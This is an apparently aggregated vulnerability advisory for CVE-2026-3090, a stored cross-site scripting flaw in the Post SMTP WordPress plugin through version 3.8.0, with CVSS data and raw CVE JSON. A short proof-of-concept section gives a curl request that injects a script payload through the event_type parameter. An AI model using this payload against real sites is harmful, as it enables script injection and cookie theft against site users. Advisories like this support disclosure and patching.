Security Vulnerability Report
中文
CVE-2026-3090 CVSS 7.2 HIGH

CVE-2026-3090

Published: 2026-03-18 16:16:29
Last Modified: 2026-04-22 21:32:08
Source: [email protected]

Description

The Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘event_type’ parameter in all versions up to, and including, 3.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability is only exploitable when the Post SMTP Pro plugin is also installed and its Reporting and Tracking extension is enabled.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Post SMTP插件 <=3.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
curl -X POST 'https://target.com/wp-admin/admin-ajax.php' -d 'action=post_smtp_save_event&event_type=<script>alert(document.cookie)</script>'

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3090", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.560", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘event_type’ parameter in all versions up to, and including, 3.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability is only exploitable when the Post SMTP Pro plugin is also installed and its Reporting and Tracking extension is enabled."}, {"lang": "es", "value": "El plugin Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP &amp; Mobile App para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro 'event_type' en todas las versiones hasta la 3.8.0, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes no autenticados inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada. La vulnerabilidad solo es explotable cuando el plugin Post SMTP Pro también está instalado y su extensión de Informes y Seguimiento está habilitada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/PostmanEmailLogs.php#L459", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3484515/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8cbbbb-2089-4966-8fd3-da4f76fb2517?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.